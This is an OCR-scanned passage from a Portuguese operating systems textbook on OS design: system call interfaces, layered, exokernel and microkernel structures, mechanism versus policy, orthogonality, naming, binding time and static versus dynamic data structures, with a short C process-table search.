A adição de mais recursos adiciona mais código 
e, assim, adiciona mais erros. Os programadores que 
acham que a adição de novos recursos não gera novos 
erros ou são novatos em computadores ou acreditam 
que uma fada madrinha está olhando por eles. 

A simplicidade não é a única questão que surge no 
projeto de chamadas de sistema. Uma importante consi- 
deração é resumida na frase de Lampson (1984): 


Não esconda potencial. 


Se o hardware tem um meio extremamente eficiente 
de fazer algo, isso deve ser exposto aos programadores 


de uma maneira simples e não enterrado dentro de al- 
guma outra abstração. O propósito das abstrações é 
esconder as propriedades indesejáveis, e não as desejá- 
veis. Por exemplo, suponha que o hardware tenha uma 
solução especial para mover grandes mapas de bits na 
área da tela (isto é, a RAM de vídeo) em alta veloci- 
dade. Nesse caso, é justificável implementar uma nova 
chamada de sistema que dê acesso a esse mecanismo, 
em vez de simplesmente fornecer mecanismos para ler 
a RAM de vídeo para a memória principal e escrevê- 
-la de volta novamente. A nova chamada deve apenas 
mover bits e nada mais. Se uma chamada de sistema é 
rápida, os usuários podem sempre construir interfaces 
mais convenientes em cima dela. Se ela é lenta, nin- 
guém a usará. 

Outra questão de projeto é o emprego de chamadas 
orientadas a conexão versus sem conexão. As chamadas 
de sistema do Windows e do UNIX, para leitura de um 
arquivo, são orientadas a conexão, como no uso do te- 
lefone. Primeiro você abre um arquivo, depois faz a lei- 
tura e finalmente o fecha. Alguns protocolos de acesso 
a arquivos remotos também são orientados a conexão. 
Por exemplo, para usar FTP, o usuário obtém primeiro a 
permissão de acesso à máquina remota, lê os arquivos e 
depois encerra sua conexão. 

Por outro lado, alguns protocolos de acesso a ar- 
quivos remotos não são orientados a conexão, como o 
protocolo da web (HTTP), por exemplo. Para ler uma 
página web, você simplesmente a solicita; não existe a 
necessidade de configuração antecipada (uma conexão 
TCP é necessária, mas ela é feita em um nível inferior 
do protocolo; o protocolo HTTP em si é sem conexão). 

O dilema principal entre qualquer mecanismo orien- 
tado a conexão e outro sem conexão está entre o traba- 
lho adicional necessário para estabelecer o mecanismo 
(por exemplo, a abertura de um arquivo) e a vantagem 
de não ter de fazer isso nas (possivelmente muitas) cha- 
madas subsequentes. Para a E/S de um arquivo em uma 
máquina isolada, em que o custo do estabelecimento da 
conexão é baixo, provavelmente a forma-padrão (pri- 
meiro abrir, depois usar) é a melhor maneira. Para os 
sistemas de arquivos remotos, a situação pode ser feita 
de ambas as maneiras. 

Outra questão relacionada à interface de chamadas 
de sistema é a visibilidade. A lista de chamadas de siste- 
ma aceita no POSIX é fácil de encontrar. Todos os sis- 
temas UNIX dão suporte a essas chamadas, bem como 
um pequeno número de outras tantas, mas a lista com- 
pleta é sempre pública. Em contrapartida, a Microsoft 
nunca tornou pública a lista de chamadas de sistema do 
Windows. Em vez disso, a WinAPI e outras APIs são 
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publicas, mas contém um grande numero de chamadas 
de biblioteca (mais de dez mil), e somente um pequeno 
numero é de chamadas de sistema verdadeiras. O prin- 
cipal argumento para tornar publicas todas as chama- 
das de sistema é que isso permite que os programadores 
saibam o que é barato (funções executadas no espaço 
do usuário) e o que é caro (chamadas de núcleo). O ar- 
gumento para não as tornar públicas é que isso dá aos 
implementadores a flexibilidade de alterar internamente 
as chamadas de sistema reais subjacentes para deixá-las 
melhor, sem destruir os programas do usuário. Como 
vimos na Seção 9.7.7, os projetistas originais simples- 
mente erraram na chamada do sistema access, mas ago- 
ra estamos presos a ela. 


12.3 Implementação 


Esquecendo as interfaces de chamadas de sistema 
e de usuário, vejamos como implementar um sistema 
operacional. Nas próximas seções serão examinadas 
algumas questões conceituais gerais relacionadas com 
estratégias de implementação. Logo em seguida, co- 
nheceremos algumas técnicas de baixo nível que muitas 
vezes são úteis. 


12.3.1 Estrutura do sistema 


Provavelmente, a primeira decisão que os programa- 
dores devem tomar é qual será a estrutura do sistema. 
Examinamos as possibilidades principais na Seção 1.7, 
mas vamos revisá-las aqui. Um projeto monolítico não 
estruturado não é realmente uma boa ideia, exceto tal- 
vez para um sistema operacional pequeno — digamos, 
de uma torradeira —, mas ainda assim é questionável. 


Sistemas em camadas 


Uma estratégia razoável que tem sido bem estabe- 
lecida ao longo dos anos é um sistema em camadas. O 
sistema THE de Dijkstra (Figura 1.25) foi o primeiro 
sistema operacional em camadas. O UNIX e o Windows 
8 também têm uma estrutura em camadas, mas o uso 
das camadas em ambos é mais uma maneira de tentar 
descrever o sistema e não um princípio real de projeto 
usado na construção do sistema. 

Para um novo sistema, os projetistas que optarem 
por esse caminho devem primeiro escolher com muito 
cuidado as camadas e definir a funcionalidade de cada 
uma. A camada inferior sempre deve tentar esconder 
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as características mais específicas do hardware, como 
a HAL faz na Figura 11.4. Provavelmente, a próxima 
camada deve tratar interrupções, trocas de contexto e a 
MMU e, acima desse nível, o código deve ser, em sua 
maioria, independente de máquina. Acima disso, proje- 
tistas diferentes terão gostos (e tendências) diferentes. 
Uma possibilidade é projetar a camada 3 para geren- 
ciar threads, incluindo escalonamento e sincronização 
entre threads, como mostrado na Figura 12.2. A ideia 
aqui é que, a partir da camada 4, já tenhamos threads 
apropriados sendo escalonados normalmente e sincro- 
nizados mediante um mecanismo-padrão (por exemplo, 
mutexes). 

Na camada 4 podemos encontrar os drivers dos dis- 
positivos, cada um executando como um thread sepa- 
rado, com seu próprio estado, contador de programa, 
registradores etc., possivelmente (mas não necessaria- 
mente) dentro do espaço de endereçamento do núcleo. 
Esse projeto pode simplificar bastante a estrutura de 
E/S, pois, quando ocorre uma interrupção, ela pode ser 
convertida para um unlock sobre um mutex e uma cha- 
mada ao escalonador para (potencialmente) escalonar 
o thread, que estava bloqueado no mutex, que entrou 
no estado de pronto. O MINIX 3 usa essa tática, mas 
no UNIX, no Linux e no Windows 8 os tratadores de 
interrupção executam em uma espécie de “terra de nin- 
guém”, em vez de executarem como threads autênticos 
que podem ser escalonados, suspensos etc. Visto que 
uma grande parte da complexidade de qualquer sistema 
operacional está na E/S, qualquer técnica para torná-la 
mais tratável e encapsulada deve ser considerada. 

Acima da camada 4, poderíamos esperar encontrar 
a memória virtual, um ou mais sistemas de arquivos e 
os tratadores de chamadas de sistema. Essas camadas 
focalizam o fornecimento de serviços às aplicações. Se 
a memória virtual está em um nível mais abaixo que os 
sistemas de arquivos, então a cache de blocos pode ser 
paginada para o disco, permitindo que o gerenciador de 
memória virtual determine dinamicamente como a me- 
mória real deve ser dividida entre as páginas do usuário 


e as páginas do núcleo, incluindo a cache. O Windows 
8 funciona assim. 


Exokernels 


Enquanto a divisão em camadas tem seus incenti- 
vadores entre os projetistas de sistemas, existe também 
um outro grupo com uma visão precisamente oposta 
(ENGLER et al., 1995), com base no argumento pon- 
ta a ponta (SALTZER et al., 1984). Esse conceito diz 
que, se algo tem de ser feito pelo próprio programa do 
usuário, é dispendioso fazê-lo também em uma cama- 
da inferior. 

Considere uma aplicação desse princípio no acesso a 
arquivos remotos. Se um sistema está preocupado com 
a corrupção de dados em trânsito, ele deve providenciar 
para que cada arquivo tenha sua soma de verificação 
calculada no momento em que ele é escrito, e a soma 
deve ser armazenada junto com o arquivo. Quando um 
arquivo é transferido pela rede do disco de origem para 
o processo de destino, a soma de verificação é transfe- 
rida também e recalculada no recebimento. Se os dois 
valores da soma não forem iguais, o arquivo é descarta- 
do e transferido novamente. 

Essa verificação é mais precisa que o uso de um pro- 
tocolo de rede confiável, visto que ela também detecta 
erros de disco, de memória, de software nos roteadores 
e outros erros além dos de transmissão de bits. O argu- 
mento ponta a ponta diz que o uso de um protocolo de 
rede confiável não é necessário, uma vez que o ponto 
final (o processo receptor) tenha informação suficien- 
te para verificar a exatidão do arquivo. O uso de um 
protocolo de rede confiável nessa visão se justifica por 
questões de eficiência — isto é, a detecção e o reparo 
dos erros de transmissão mais cedo. 

O argumento ponta a ponta pode ser estendido para 
tudo no sistema operacional. Essa ideia defende que o 
sistema operacional não deve fazer tudo aquilo que o 
programa do usuário é capaz de fazer por si próprio. 


[FIGURA 12.2] Um projeto possível para um sistema operacional em camadas moderno. 
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Por exemplo, por que ter um sistema de arquivos? Dei- 
xe que o usuário leia e escreva no disco de uma ma- 
neira protegida. Claro, a maioria dos usuários gosta de 
ter arquivos, mas o argumento ponta a ponta diz que o 
sistema de arquivos deveria ser uma rotina de bibliote- 
ca ligada com qualquer programa que precise usar ar- 
quivos. Essa prática permite que diferentes programas 
tenham diferentes sistemas de arquivos. Essa linha de 
raciocínio diz que o sistema operacional deveria apenas 
alocar recursos de modo seguro (por exemplo, a CPU e 
os discos) entre os usuários concorrentes. O Exokernel 
é um sistema operacional construído de acordo com o 
argumento ponta a ponta (ENGLER et al., 1995). 


Sistemas cliente-servidor baseados em microkernel 


Um meio-termo entre o sistema operacional ter de 
fazer tudo e não fazer nada é o sistema operacional fa- 
zer um pouco. Essa ideia leva ao microkernel, em que 
muitas partes do sistema operacional executam como 
processos servidores no nível do usuário, como ilustra a 
Figura 12.3. De todas as ideias de projeto, essa é a mais 
modular e flexível. O máximo da flexibilidade consiste 
em ter cada driver de dispositivo executando como um 
processo de usuário, totalmente protegido contra o nú- 
cleo e outros drivers, mas a modularidade aumenta mes- 
mo quando os drivers de dispositivos rodam no modo 
núcleo. 

Quando os drivers de dispositivos estão no núcleo, 
eles podem acessar diretamente os registros de disposi- 
tivos de hardware. Quando não estão, algum mecanis- 
mo se faz necessário para oferecer essa facilidade. Se o 
hardware assim o permitisse, cada processo de driver 
poderia ter acesso apenas aos dispositivos de E/S de 
que ele necessitasse. Por exemplo, com a E/S mapea- 
da na memória, cada processo de driver poderia ter a 
página para seu dispositivo mapeada na memória, mas 
nenhuma página de outro dispositivo. Se o espaço de 
endereçamento da porta de E/S puder ser parcialmente 
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protegido, a parte correta dele poderá ser disponibiliza- 
da para cada driver. 

Mesmo que nenhuma assistência do hardware esteja 
disponível, a ideia ainda pode ser posta em prática. Nes- 
se caso, será necessária uma nova chamada de sistema, 
disponível somente aos drivers de dispositivos, forne- 
cendo uma lista de pares (porta, valor). O que o núcleo 
faz é primeiro verificar se o processo é o proprietário de 
todas as portas da lista. Em caso afirmativo, ele então 
copia os valores correspondentes para as portas a fim de 
iniciar a E/S do dispositivo. Uma chamada similar pode 
ser usada para ler as portas de E/S. 

Essa prática evita que os drivers de dispositivos exa- 
minem (e danifiquem) as estruturas de dados do núcleo, 
o que (em sua maior parte) costuma ser uma boa coisa. 
Um conjunto análogo de chamadas poderia ser disponi- 
bilizado para permitir que os processos de drivers leiam 
e escrevam em tabelas do núcleo, mas somente de modo 
controlado e com o consentimento do núcleo. 

O principal problema com essa abordagem e com o 
microkernel em geral é a perda de desempenho causado 
por todas as trocas extras de contexto. Entretanto, prati- 
camente todo o trabalho com microkernels foi feito há 
muitos anos, quando as CPUs eram muito mais lentas. 
Hoje, são bem poucas as aplicações que usam cada gota 
da capacidade da CPU e não podem tolerar uma perda 
mínima de desempenho. Afinal, quando se executa um 
processador de textos ou um navegador web, a CPU cos- 
tuma ficar ociosa durante 95% do tempo. Se um sistema 
operacional baseado em microkernel transformasse um 
sistema de 3,5 GHz não confiável em um sistema de 3,0 
GHz confiável, provavelmente poucos usuários se quei- 
xariam, ou nem sequer notariam. Afinal, a maioria deles 
era bem feliz até pouco tempo atrás, quando obtinham 
de seus computadores a velocidade na época estupen- 
da de 1 GHz. Além disso, não fica claro se o custo da 
comunicação entre processos ainda é um problema tão 
grande se os núcleos de processamento não são mais 
um recurso escasso. Se cada driver de dispositivo e cada 
componente do sistema operacional tivesse seu próprio 


(FIGURA 12.3] Computação cliente-servidor baseada em um microkernel. 
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nucleo de processamento dedicado, nao haveria troca de 
contexto durante a comunicação entre processos. Além 
disso, as caches, previsores de desvio e os TLBs estarão 
todos aquecidos e prontos para uso em plena velocida- 
de. Algum trabalho experimental em um sistema ope- 
racional de alto desempenho, baseado em microkernel, 
foi apresentado por Hruby et al. (2013). 

Vale ressaltar que, embora os microkernels não sejam 
populares em desktops, eles são largamente utilizados em 
telefones celulares, sistemas industriais, sistemas embar- 
cados e sistemas militares, nos quais uma alta confiabili- 
dade é essencial. Além disso, o OS X da Apple, que roda 
em todos os Macs e Macbooks, consiste em uma versão 
modificada do FreeBSD rodando em cima de uma versão 
modificada do microkernel Mach. 


Sistemas extensíveis 


Com os sistemas cliente-servidor discutidos ante- 
riormente, a ideia era colocar o máximo possível fora 
do núcleo. A abordagem oposta é colocar mais módulos 
no núcleo, mas de uma maneira protegida. A palavra- 
-chave aqui é protegida, claro. Estudamos alguns me- 
canismos de proteção na Seção 9.5.6, os quais de início 
eram destinados à importação de applets pela internet, 
mas que se aplicam igualmente na inserção de códigos 
de terceiros no núcleo. Os mais importantes são o sand- 
boxing (caixa de areia) e a assinatura de código, pois a 
interpretação não é realmente prática para o código do 
núcleo. 

Um sistema extensível por si próprio obviamente não 
é uma maneira para estruturar um sistema operacional. 
Contudo, começando com um sistema mínimo que pos- 
sui pouco mais que um mecanismo de proteção e depois 
adicionando módulos protegidos ao núcleo, um por vez, 
até que se alcance a funcionalidade desejada, um sistema 
mínimo pode ser construído para a aplicação em mãos. 
Desse modo, um novo sistema operacional pode ser 
construído sob medida para cada aplicação, por meio da 
inclusão somente das partes necessárias. Paramecium é 
um exemplo de tal sistema (VAN DOORN, 2001). 


Threads do núcleo 


Outra questão relevante diz respeito aos threads do sis- 
tema, não importando qual modelo de estruturação seja 
o escolhido. Muitas vezes é conveniente permitir que os 
threads do núcleo tenham existência independente de qual- 
quer processo do usuário. Esses threads podem executar 
em segundo plano, gravando páginas modificadas no dis- 
co, trocando processos entre a memória principal e o disco, 


e assim por diante. De fato, o núcleo por si próprio pode 
ser estruturado totalmente com esses threads, de modo 
que, quando o usuário faz uma chamada de sistema, em 
vez de o thread do usuário executar em modo núcleo, este 
é bloqueado e passa o controle para um thread do núcleo, 
que assume o controle para realizar o trabalho. 

Além dos threads do núcleo que estão executando em 
segundo plano, a maioria dos sistemas operacionais dis- 
para muitos processos servidores (daemon) em segundo 
plano. Apesar de não fazerem parte do sistema operacio- 
nal, eles muitas vezes executam atividades do tipo “do 
sistema”, Essas atividades podem incluir a obtenção e o 
envio de e-mails e o atendimento a diversos tipos de so- 
licitações de usuários remotos, como FTP e páginas web. 


12.3.2 Mecanismo versus política 


Outro princípio que auxilia na coerência arquitetural, 
mantendo ainda as coisas pequenas e bem estruturadas, 
é a separação do mecanismo da política. Colocando o 
mecanismo no sistema operacional e deixando a políti- 
ca para os processos do usuário, o sistema por si próprio 
pode ser mantido sem modificação, mesmo que exista a 
necessidade de trocar a política. Ainda que o módulo de 
política seja mantido no núcleo, ele deve ser isolado do 
mecanismo, se possível, de modo que as alterações no 
módulo de política não afetem o módulo de mecanismo. 

Para tornar mais clara a separação entre a política e o 
mecanismo, vamos considerar dois exemplos do mundo 
real. Como primeiro caso, considere uma grande com- 
panhia com um departamento de recursos humanos, en- 
carregado do pagamento dos salários dos empregados. 
Ele tem computadores, softwares, cheques em branco, 
acordos com bancos e demais mecanismos para pagar 
os salários. Contudo, a política — a determinação de 
quem recebe quanto — é completamente separada e de- 
cidida pela gerência. O departamento de recursos huma- 
nos apenas faz aquilo que é solicitado a fazer. 

Como segundo exemplo, imagine um restaurante. 
Ele tem um mecanismo para servir refeições, incluindo 
mesas, pratos, garçons, uma cozinha totalmente equi- 
pada, acordos com fornecedores de alimentos e compa- 
nhias de cartão de crédito, e assim por diante. A política 
é definida pelo chefe de cozinha — ou seja, aquilo que 
está no menu. Se o chefe de cozinha decide que tofu 
está fora e bifes de chorizo são o máximo, essa nova 
política pode ser tratada pelo mecanismo existente. 

Vamos agora considerar alguns exemplos de sistemas 
operacionais. Primeiro, o escalonamento de threads. O 
núcleo pode ter um escalonador de prioridade, com  ní- 
veis de prioridades. Como no UNIX e no Windows 8, o 


mecanismo é um arranjo, indexado pelo nível de prio- 
ridade. Cada entrada é a cabeça de uma lista de threads 
prontos naquele nível de prioridade. O escalonador ape- 
nas percorre o arranjo da maior para o de menor priorida- 
de, selecionando os primeiros threads que ele encontra. A 
política é a definição das prioridades. O sistema pode ter 
diferentes classes de usuários, cada uma com uma priori- 
dade diferente, por exemplo. Ele ainda pode permitir que 
os processos do usuário ajustem as prioridades relativas 
de seus threads. As prioridades podem ser aumentadas 
após a conclusão de E/S ou diminuídas após o uso de 
um quantum de tempo. Existem inúmeras outras políticas 
que poderiam ser seguidas, mas a ideia é mostrar a sepa- 
ração entre a definição da política e sua execução. 

Um segundo exemplo é o da paginação. O mecanis- 
mo envolve o gerenciamento de MMU, mantendo listas 
de páginas ocupadas e páginas livres, e códigos para 
transferir as páginas entre a memória e o disco. A poli- 
tica decide o que fazer quando ocorre uma falta de pá- 
gina. Ela pode ser local ou global, baseada em LRU ou 
FIFO ou em algum outro tipo, mas esse algoritmo pode 
(e deve) ser completamente separado dos mecanismos 
de gerenciamento real das páginas. 

Um terceiro exemplo permite o carregamento de 
módulos para dentro do núcleo. O mecanismo se pre- 
ocupa com o modo como eles são inseridos e ligados, 
quais chamadas são capazes de realizar e quais cha- 
madas podem ser feitas com eles. A política determina 
quem tem a permissão para carregar um módulo dentro 
do núcleo e quais são os módulos permitidos. Talvez 
somente o superusuário possa carregar os módulos, mas 
pode ser que qualquer usuário possa carregar um módu- 
lo que tenha sido assinado de modo digital pela autori- 
dade apropriada. 


12.3.3 Ortogonalidade 


Um bom projeto de sistema consiste em conceitos se- 
parados que podem ser combinados independentemente. 
Por exemplo, em C, existem tipos de dados primitivos 
que incluem inteiros, caracteres e números em ponto 
flutuante. Também há mecanismos para combinar tipos 
de dados, incluindo arranjos, estruturas e uniões. Essas 
ideias combinam de modo independente, permitindo 
arranjos de inteiros, arranjos de caracteres, estruturas e 
membros de união que são números em ponto flutuante 
etc. De fato, uma vez que um novo tipo de dados é defini- 
do, como um arranjo de inteiros, ele pode ser usado como 
se fosse um tipo de dado primitivo — por exemplo, como 
um membro de uma estrutura ou uma união. A habilidade 
para combinar conceitos separados independentemente é 
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chamada de ortogonalidade — consequência direta dos 
princípios de simplicidade e completude. 

O conceito de ortogonalidade também ocorre em sis- 
temas operacionais de maneira disfarçada. Um exemplo 
é a chamada de sistema clone do Linux, que cria um 
novo thread. A chamada tem um mapa de bits como pa- 
râmetro, que permite que o espaço de endereçamento, 
o diretório de trabalho, os descritores de arquivos e os 
sinais sejam compartilhados ou copiados individual- 
mente. Se tudo é copiado, temos um novo processo, o 
mesmo que fork. Se nada é copiado, um novo thread é 
criado no processo atual. No entanto, também é possível 
criar formas intermediárias de compartilhamento não 
permitidas nos sistemas UNIX tradicionais. Separando 
as várias características e tornando-as ortogonais, torna- 
-se factível um grau de controle mais apurado. 

Outro uso da ortogonalidade é a separação do con- 
ceito de processo do conceito de thread no Windows 
8. Um processo é um contêiner para recursos, e apenas 
isso. Um thread é uma entidade escalonável. Quando 
um processo recebe um identificador de outro processo, 
não interessa quantos threads ele possa ter. Quando um 
thread é escalonado, não interessa a qual processo ele 
pertence. Esses conceitos são ortogonais. 

Nosso último exemplo de ortogonalidade vem do 
UNIX. Nele, a criação de processos é feita em dois pas- 
sos: fork seguido de exec. A criação de um novo espaço 
de endereçamento e seu carregamento com uma nova 
imagem na memória são ações separadas, permitindo 
que outras ações possam ser realizadas entre elas (como 
a manipulação de descritores de arquivos). No Windows 
8, esses dois passos não podem ser separados, isto é, os 
conceitos de criação de um novo espaço de endereça- 
mento e o preenchimento desse espaço não são ortogo- 
nais. A sequência do Linux de clone mais exec é ainda 
mais ortogonal, pois existem mais blocos de construção 
disponíveis com maior detalhamento. Como regra, um 
pequeno número de elementos ortogonais que possam 
ser combinados de várias maneiras leva a um sistema 
pequeno, simples e elegante. 


12.3.4 Nomeação 


Muitas das estruturas de dados de longa duração usa- 
das por um sistema operacional têm algum tipo de nome 
ou identificador pelos quais elas podem ser referencia- 
das. Exemplos óbvios são nomes de usuário, nomes de 
arquivo, nomes de dispositivo, identificadores de pro- 
cesso e assim por diante. O modo como esses nomes são 
construídos e gerenciados é um aspecto importante no 
projeto e na implementação do sistema. 
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Os nomes projetados principalmente para pesso- 
as são constituídos de cadeias de caracteres em códi- 
go ASCII ou Unicode e em geral são hierárquicos. Os 
caminhos de diretório — /usr/ast/books/mos2/chap-12, 
por exemplo — são nitidamente hierárquicos, indican- 
do uma série de diretórios que devem ser percorridos a 
partir do diretório-raiz. URLs também são hierárquicos. 
Por exemplo, www.cs.vu.nl/~ast/ indica uma máquina 
específica (www) em um departamento específico (cs) 
de uma universidade específica (vu) em um país espe- 
cífico (nl). O segmento depois da barra aponta para um 
arquivo específico na máquina referenciada — nesse 
caso, por convenção, www/index.html no diretório pes- 
soal de ast. Note que os URLs (e os endereços DNS 
em geral, incluindo os de e-mail) são montados “de trás 
para a frente”, começando na base da árvore e subindo, 
ao contrário dos nomes de arquivos, os quais começam 
no topo da árvore e descem. Outra maneira de observar 
isso é verificar se a árvore é escrita a partir do topo co- 
meçando na esquerda e indo para a direita ou iniciando 
na direita e indo para a esquerda. 

Muitas vezes a nomeação é feita em dois níveis: ex- 
terno e interno. Por exemplo, os arquivos sempre têm 
nomes como cadeias de caracteres em ASCII ou Uni- 
code para as pessoas usarem. Além disso, quase sempre 
existe um nome interno que o sistema usa. No UNIX, 
o nome real de um arquivo é seu número de i-node; o 
nome ASCII não é empregado internamente. De fato, 
ele nem sequer é único, visto que um arquivo pode ter 
várias ligações para ele. O nome interno análogo no 
Windows 8 é o índice do arquivo na MFT. A função do 
diretório é fornecer o mapeamento entre o nome externo 
e o nome interno, como mostra a Figura 12.4. 

Em muitos casos (como o exemplo dos nomes de ar- 
quivos dado anteriormente), o nome interno é um intei- 
ro sem sinal que serve como um índice para uma tabela 


do núcleo. Outros exemplos de nomes como índices de 
tabelas são os descritores de arquivos do UNIX e os 
descritores de objetos do Windows 8. Note que nenhum 
desses tem qualquer representação externa: são estri- 
tamente para uso do sistema e dos processos em exe- 
cução. Em geral, é uma boa ideia empregar índices de 
tabelas para nomes transientes que são perdidos quando 
o sistema é reinicializado. 

Os sistemas operacionais muitas vezes dão suporte 
a múltiplos espaços de nomes, tanto externos quanto 
internos. Por exemplo, no Capítulo 11 vimos três espa- 
ços de nomes (namespaces) externos suportados pelo 
Windows 8: nomes de arquivo, nomes de objeto e no- 
mes de registro (e existe também o espaço de nomes do 
Active Directory, que não foi abordado). Além disso, 
há inúmeros espaços de nomes internos que empregam 
inteiros sem sinais — por exemplo, descritores de obje- 
tos, entradas na MFT etc. Embora os nomes nos espaços 
de nomes externos sejam todos formados por cadeias 
de caracteres em Unicode, a procura por um nome de 
arquivo no registro não irá funcionar, assim como tam- 
bém o uso de um índice MFT na tabela de objetos. Em 
um bom projeto, é necessária uma análise considerável 
para saber quantos espaços de nomes serão necessários, 
qual será a sintaxe de nomes para cada um, como eles 
serão diferenciados, se existirão nomes absolutos e re- 
lativos, e assim por diante. 


12.3.5 Momento de associação (binding time) 


Como vimos, os sistemas operacionais usam vários 
tipos de nomes para referenciar os objetos. Às vezes o 
mapeamento entre um nome e um objeto é fixo, mas 
outras vezes, não. No segundo caso, pode ser importan- 
te saber o momento em que o nome é ligado ao objeto. 
Em geral, a associação antecipada (early binding) é 


[FIGURA 12.4 | Os diretórios são usados para mapear nomes externos em nomes internos. 
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simples, mas não flexível, ao passo que a associação 
tardia (late binding) é mais complicada, embora muitas 
vezes seja mais flexível. 

Para esclarecer o conceito de momento de associa- 
ção, é interessante observar alguns casos do mundo real. 
Um exemplo de associação antecipada é a prática de 
certas universidades de permitir que os pais matriculem 
seu bebê logo no momento do nascimento e paguem an- 
tecipadamente suas mensalidades. Quando o estudante 
chegar aos 18 anos, as mensalidades estarão todas pa- 
gas, não importando os valores delas naquele momento. 

No processo de manufatura, as peças solicitadas an- 
tecipadamente e a manutenção do estoque são exemplos 
de associação antecipada. Em contraste, o processo de 
fabricação just-in-time requer que os fornecedores se- 
jam capazes de fornecer as peças imediatamente, sem a 
necessidade de uma solicitação adiantada (um exemplo 
de associação tardia). 

As linguagens de programação muitas vezes permi- 
tem múltiplos momentos de associação para as variá- 
veis. O compilador associa as variáveis globais a um 
endereço virtual específico. Isso exemplifica a associa- 
ção antecipada. As variáveis que são locais a um pro- 
cedimento recebem um endereço virtual (na pilha) no 
momento em que o procedimento é chamado — trata- 
-se de uma associação intermediária. As variáveis ar- 
mazenadas dinamicamente na memória heap (aquelas 
alocadas por malloc em C ou new em Java) recebem 
endereços virtuais somente no momento em que são re- 
almente utilizadas. Nesse caso, temos associação tardia. 

Os sistemas operacionais com frequência usam a 
associação antecipada para a maioria das estruturas de 
dados, mas às vezes empregam a associação tardia por 
questões de flexibilidade. A alocação de memória é um 
exemplo. Os primeiros sistemas multiprogramados em 
máquinas que não tinham hardware para a realocação 
de endereços precisavam carregar um programa em al- 
gum endereço de memória, reposicionando-o para que 
pudesse ser executado ali. Se o programa fosse leva- 
do para o disco, ele teria de ser trazido de volta para o 
mesmo endereço de memória, senão causaria erros. Em 
contraste, a memória virtual paginada é uma forma de 
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associação tardia. O endereço físico real correspondente 
a um dado endereço virtual não é conhecido até que a 
página seja tocada e trazida de fato para a memória. 

Outro exemplo de associação tardia é a colocação de 
janelas em uma GUI. Ao contrário do que ocorria com 
os primeiros sistemas gráficos, em que o programador 
era obrigado a especificar a coordenada absoluta da tela 
para cada imagem, nas GUIs modernas o software usa 
coordenadas relativas à origem da janela, que não é de- 
terminada até que esta seja colocada na tela, e pode ain- 
da ser trocada posteriormente. 


12.3.6 Estruturas estáticas versus dinâmicas 


Os projetistas de sistemas operacionais são constan- 
temente forçados a escolher entre estruturas de dados 
estáticas e dinâmicas. As estáticas são sempre mais sim- 
ples de compreender, mais fáceis de programar e mais 
rápidas de usar; as dinâmicas, por sua vez, são mais fle- 
xíveis. Um exemplo óbvio é a tabela de processos. Os 
primeiros sistemas apenas alocavam um vetor fixo de 
estruturas por processo. Se a tabela de processos tivesse 
256 entradas, então somente 256 processos poderiam 
existir em um mesmo instante. Uma tentativa de criar o 
257º processo causaria uma falha em razão da falta de 
espaço na tabela. Estratégias similares eram emprega- 
das nas tabelas de arquivos abertos (por usuário e para 
o sistema todo) e nas muitas outras tabelas do núcleo. 

Uma estratégia alternativa é construir a tabela de 
processos como uma lista encadeada de minitabelas, ini- 
ciando com uma única. Se essa tabela saturar, outra será 
alocada de um conjunto global e encadeada à primeira. 
Desse modo, a tabela de processos não ficará cheia, a 
menos que toda a memória do núcleo seja utilizada. 

Por outro lado, o código para pesquisar a tabela tor- 
na-se mais complicado. Por exemplo, observe o código 
para pesquisar uma tabela de processos estática e en- 
contrar um dado PID, pid, mostrado na Figura 12.5. Isso 
é simples e eficiente. Fazer a mesma tarefa usando uma 
lista encadeada de minitabelas é mais trabalhoso. 

As tabelas estáticas são melhores quando existe uma 
grande quantidade de memória ou quando a utilização 


Jet EFAJ Código para a pesquisa na tabela de processos por um dado PID. 


found = 0; 


for (p = &proc_table[0]; p < &proc. table[PROC. TABLE. SIZE]; p++) { 


if (p->proc_pid == pid) { 
found = 1; 
break; 
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das tabelas pode ser estipulada com bastante precisão. 
Por exemplo, em um sistema monousuário, é pouco 
provável que o usuário tente inicializar mais do que 128 
processos de uma só vez, e não será um desastre total se 
uma tentativa de inicializar um 129º falhar. 

Outra possibilidade é usar uma tabela de tamanho 
fixo, que, quando saturada, uma nova tabela de tamanho 
fixo pode ser alocada, digamos, com o dobro do tama- 
nho. As entradas atuais são, então, copiadas para a nova 
tabela e a antiga é devolvida para a memória disponível. 
Desse modo, a tabela é sempre contígua em vez de en- 
cadeada. A desvantagem, nesse caso, é a necessidade 
de algum gerenciamento de memória, e o endereço da 
tabela é, agora, uma variável em vez de uma constante. 

Uma questão similar se aplica às pilhas do núcleo. 
Quando um thread está executando no modo núcleo ou 
chaveia para esse modo, ele precisa de uma pilha no 
espaço do núcleo. Para os threads do usuário, a pilha 
pode ser inicializada para executar a partir do topo do 
espaço de endereçamento virtual, de modo que o tama- 
nho necessário não precise ser especificado antecipada- 
mente. Para os threads do núcleo, o tamanho tem de ser 
especificado antecipadamente, pois a pilha consome al- 
gum espaço de endereçamento virtual do núcleo e pode 
haver muitas pilhas. A questão é: quanto espaço cada 
thread deve obter? O dilema, nesse caso, é similar ao da 
tabela de processos. É possível tornar as estruturas de 
dados chave dinâmicas, mas isso é complicado. 

Outra ponderação estático-dinâmica é o escalona- 
mento de processos. Em alguns sistemas, em especial 
os de tempo real, o escalonamento pode ser feito es- 
taticamente de maneira antecipada. Por exemplo, uma 
linha aérea sabe quais os horários em que seus voos par- 
tirão semanas antes das partidas propriamente ditas. De 
modo semelhante, os sistemas multimídia sabem quan- 
do escalonar áudio, vídeo e outros processos de modo 
antecipado. Para o uso em geral, essas considerações 
não prevalecem e o escalonamento deve ser dinâmico. 

Ainda uma outra questão estático-dinâmica é a es- 
trutura do núcleo. É muito mais simples quando o nú- 
cleo é construído como um único programa binário e 
carregado na memória para execução. A consequência 
desse projeto, contudo, é que a adição de novos dis- 
positivos de E/S requer uma religação do núcleo com 
o novo driver do dispositivo. As primeiras versões do 
UNIX funcionavam assim, algo totalmente satisfatório 
em um ambiente de minicomputador, quando a adição 
de novos dispositivos de E/S era uma ocorrência rara. 
Hoje, a maioria dos sistemas operacionais permite que 
um código seja dinamicamente adicionado ao núcleo, 
com toda a complexidade extra que isso exige. 


12.3.7 Implementação de cima para baixo versus 
de baixo para cima 


Embora seja melhor projetar o sistema de cima para 
baixo, teoricamente ele pode ser implementado tanto de 
cima para baixo quanto de baixo para cima. Em uma 
implementação de cima para baixo, os implementado- 
res iniciam com os tratadores de chamadas de sistema 
e observam quais mecanismos e estruturas de dados 
são necessários para que eles funcionem. Esses proce- 
dimentos são escritos e a descida prossegue até que o 
hardware seja alcançado. 

O problema com essa abordagem é que fica difícil 
testar o sistema todo apenas com os procedimentos dis- 
